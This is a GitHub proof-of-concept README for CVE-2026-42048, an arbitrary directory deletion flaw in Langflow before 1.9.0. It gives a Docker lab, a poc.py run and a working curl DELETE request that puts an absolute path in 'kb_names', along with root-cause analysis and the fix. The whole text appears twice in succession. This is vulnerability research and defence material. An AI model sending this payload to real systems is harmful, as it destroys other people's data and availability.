EQSTLab/CVE-2026-42048
GitHub: EQSTLab/CVE-2026-42048
Stars: 2 | Forks: 0
# CVE-2026-42048
**CVE-2026-42048 Langflow Path Traversal / Arbitrary Directory Deletion PoC**
https://github.com/user-attachments/assets/6e5481ff-e953-47a5-8870-70b30c6550de
## Description CVE-2026-42048 : Langflow Arbitrary Directory Deletion Vulnerability description: A path traversal vulnerability in Langflow before `1.9.0` allows an authenticated attacker to delete directories outside the intended Knowledge Base storage path through the bulk delete endpoint, `DELETE /api/v1/knowledge_bases`. The issue occurs because user-controlled `kb_names` values are used to construct filesystem paths without proper normalization and containment validation.
## Preconditions Successful exploitation requires the following conditions: - The target is running a vulnerable Langflow version, before `1.9.0`. - The attacker can reach the Knowledge Bases bulk delete endpoint: DELETE /api/v1/knowledge_bases - The attacker is authenticated or can otherwise make authenticated API requests. Public advisories describe this issue as requiring low privileges (`PR:L`). - The attacker can control the `kb_names` request body parameter. - The Langflow process has filesystem permission to delete the target directory. This vulnerability does not bypass operating system file permissions. It abuses Langflow's own path handling and deletion logic.
## Lab Setup Build and run the vulnerable environment using Docker: ### Build Image docker build -t cve-2026-42048 . ### Run Container docker run --rm -d -p 9101:9101 --name cve-2026-42048 cve-2026-42048 ### Check Status curl http://127.0.0.1:9101/status The lab creates a disposable target directory at: /target/CVE-2026-42048 The `/status` endpoint reports whether that directory still exists.
## How to use ### Exploit with PoC python3 poc.py Interactive input: Vulnerable URL: http://127.0.0.1:9101 Path to delete [/target/CVE-2026-42048]: ### Exploit with curl curl -s -X DELETE http://127.0.0.1:9101/api/v1/knowledge_bases \ -H "Content-Type: application/json" \ -d '{"kb_names":["/target/CVE-2026-42048"]}' ### Verify Result curl http://127.0.0.1:9101/status If exploitation succeeds, `target_exists` changes from `true` to `false`.
## Analysis **Vulnerable Endpoint** DELETE /api/v1/knowledge_bases The vulnerability exists in Langflow's Knowledge Bases bulk delete API. The affected handler accepts a list of Knowledge Base names through the `kb_names` parameter and uses each value to build a filesystem path for deletion. In vulnerable versions, the bulk delete logic manually constructs the path instead of using the safer path resolution helper used by other Knowledge Base endpoints. A simplified representation of the vulnerable pattern is: kb_root_path = KBStorageHelper.get_root_path() kb_user_path = kb_root_path / current_user.username for kb_name in request.kb_names: kb_path = kb_user_path / kb_name if not kb_path.exists() or not kb_path.is_dir(): continue KBStorageHelper.delete_storage(kb_path, kb_name) The delete helper eventually removes the target directory with recursive deletion logic. Because `kb_name` is attacker-controlled, path traversal sequences such as `../` can escape the current user's Knowledge Base directory. In Python's `pathlib`, an absolute path supplied on the right-hand side can also override the previous path components: Path("/safe/base") / "/target/CVE-2026-42048" # -> /target/CVE-2026-42048 As a result, a crafted `kb_names` value can cause Langflow to delete a directory outside the intended Knowledge Base storage root, as long as the Langflow process has permission to remove that directory. This is a **CWE-22: Improper Limitation of a Pathname to a Restricted Directory** issue. ### Technical Root Cause The root cause is insufficient normalization and boundary validation of user-controlled path components before recursive deletion. The vulnerable bulk delete endpoint checks whether the final path exists, but it does not ensure that the resolved path remains under the authenticated user's Knowledge Base directory. A robust fix must: - normalize the final path with `Path.resolve()` - ensure the resolved path is still inside the authenticated user's Knowledge Base directory - reject paths that escape that directory before deletion Langflow fixed this issue in `1.9.0`. ### Why This Matters Arbitrary directory deletion can directly impact integrity and availability. Depending on deployment permissions and filesystem layout, an attacker may be able to: - delete another user's Knowledge Base data - remove application-owned directories - disrupt Langflow runtime state - cause data loss or service interruption This issue does not require arbitrary code execution to be harmful. Recursive deletion with application privileges is enough to damage data and availability.
## Scenario +-------------------------------------------+ | Authenticated User | +-------------------------------------------+ | | DELETE /api/v1/knowledge_bases | kb_names = ["/target/CVE-2026-42048"] v +-------------------------------------------+ | Langflow Knowledge Base API | +-------------------------------------------+ | | Unsafe path construction v +-------------------------------------------+ | Path Escapes Intended KB User Directory | +-------------------------------------------+ | | Recursive directory deletion v +-------------------------------------------+ | Arbitrary Directory Deletion | +-------------------------------------------+
## Lab Notes This lab exposes a small challenge proxy on port `9101`. The proxy keeps the full Langflow UI and direct backend port hidden, while forwarding only the minimal vulnerable API path required for this exercise. The target directory for the lab is: /target/CVE-2026-42048 The `/status` endpoint can be used to confirm that the target directory has been deleted.
## Cleanup docker stop cve-2026-42048
## Disclaimer This repository is not intended to facilitate unauthorized exploitation of Langflow instances. The purpose of this project is to help security researchers, defenders, and developers understand the vulnerability, validate exposure in controlled environments, and apply effective mitigations.
## References https://github.com/langflow-ai/langflow/security/advisories/GHSA-9whx-c884-c68q https://nvd.nist.gov/vuln/detail/CVE-2026-42048 https://github.com/langflow-ai/langflow
## Description CVE-2026-42048 : Langflow Arbitrary Directory Deletion Vulnerability description: A path traversal vulnerability in Langflow before `1.9.0` allows an authenticated attacker to delete directories outside the intended Knowledge Base storage path through the bulk delete endpoint, `DELETE /api/v1/knowledge_bases`. The issue occurs because user-controlled `kb_names` values are used to construct filesystem paths without proper normalization and containment validation.
## Preconditions Successful exploitation requires the following conditions: - The target is running a vulnerable Langflow version, before `1.9.0`. - The attacker can reach the Knowledge Bases bulk delete endpoint: DELETE /api/v1/knowledge_bases - The attacker is authenticated or can otherwise make authenticated API requests. Public advisories describe this issue as requiring low privileges (`PR:L`). - The attacker can control the `kb_names` request body parameter. - The Langflow process has filesystem permission to delete the target directory. This vulnerability does not bypass operating system file permissions. It abuses Langflow's own path handling and deletion logic.
## Lab Setup Build and run the vulnerable environment using Docker: ### Build Image docker build -t cve-2026-42048 . ### Run Container docker run --rm -d -p 9101:9101 --name cve-2026-42048 cve-2026-42048 ### Check Status curl http://127.0.0.1:9101/status The lab creates a disposable target directory at: /target/CVE-2026-42048 The `/status` endpoint reports whether that directory still exists.
## How to use ### Exploit with PoC python3 poc.py Interactive input: Vulnerable URL: http://127.0.0.1:9101 Path to delete [/target/CVE-2026-42048]: ### Exploit with curl curl -s -X DELETE http://127.0.0.1:9101/api/v1/knowledge_bases \ -H "Content-Type: application/json" \ -d '{"kb_names":["/target/CVE-2026-42048"]}' ### Verify Result curl http://127.0.0.1:9101/status If exploitation succeeds, `target_exists` changes from `true` to `false`.
## Analysis **Vulnerable Endpoint** DELETE /api/v1/knowledge_bases The vulnerability exists in Langflow's Knowledge Bases bulk delete API. The affected handler accepts a list of Knowledge Base names through the `kb_names` parameter and uses each value to build a filesystem path for deletion. In vulnerable versions, the bulk delete logic manually constructs the path instead of using the safer path resolution helper used by other Knowledge Base endpoints. A simplified representation of the vulnerable pattern is: kb_root_path = KBStorageHelper.get_root_path() kb_user_path = kb_root_path / current_user.username for kb_name in request.kb_names: kb_path = kb_user_path / kb_name if not kb_path.exists() or not kb_path.is_dir(): continue KBStorageHelper.delete_storage(kb_path, kb_name) The delete helper eventually removes the target directory with recursive deletion logic. Because `kb_name` is attacker-controlled, path traversal sequences such as `../` can escape the current user's Knowledge Base directory. In Python's `pathlib`, an absolute path supplied on the right-hand side can also override the previous path components: Path("/safe/base") / "/target/CVE-2026-42048" # -> /target/CVE-2026-42048 As a result, a crafted `kb_names` value can cause Langflow to delete a directory outside the intended Knowledge Base storage root, as long as the Langflow process has permission to remove that directory. This is a **CWE-22: Improper Limitation of a Pathname to a Restricted Directory** issue. ### Technical Root Cause The root cause is insufficient normalization and boundary validation of user-controlled path components before recursive deletion. The vulnerable bulk delete endpoint checks whether the final path exists, but it does not ensure that the resolved path remains under the authenticated user's Knowledge Base directory. A robust fix must: - normalize the final path with `Path.resolve()` - ensure the resolved path is still inside the authenticated user's Knowledge Base directory - reject paths that escape that directory before deletion Langflow fixed this issue in `1.9.0`. ### Why This Matters Arbitrary directory deletion can directly impact integrity and availability. Depending on deployment permissions and filesystem layout, an attacker may be able to: - delete another user's Knowledge Base data - remove application-owned directories - disrupt Langflow runtime state - cause data loss or service interruption This issue does not require arbitrary code execution to be harmful. Recursive deletion with application privileges is enough to damage data and availability.
## Scenario +-------------------------------------------+ | Authenticated User | +-------------------------------------------+ | | DELETE /api/v1/knowledge_bases | kb_names = ["/target/CVE-2026-42048"] v +-------------------------------------------+ | Langflow Knowledge Base API | +-------------------------------------------+ | | Unsafe path construction v +-------------------------------------------+ | Path Escapes Intended KB User Directory | +-------------------------------------------+ | | Recursive directory deletion v +-------------------------------------------+ | Arbitrary Directory Deletion | +-------------------------------------------+
## Lab Notes This lab exposes a small challenge proxy on port `9101`. The proxy keeps the full Langflow UI and direct backend port hidden, while forwarding only the minimal vulnerable API path required for this exercise. The target directory for the lab is: /target/CVE-2026-42048 The `/status` endpoint can be used to confirm that the target directory has been deleted.
## Cleanup docker stop cve-2026-42048
## Disclaimer This repository is not intended to facilitate unauthorized exploitation of Langflow instances. The purpose of this project is to help security researchers, defenders, and developers understand the vulnerability, validate exposure in controlled environments, and apply effective mitigations.
## References https://github.com/langflow-ai/langflow/security/advisories/GHSA-9whx-c884-c68q https://nvd.nist.gov/vuln/detail/CVE-2026-42048 https://github.com/langflow-ai/langflow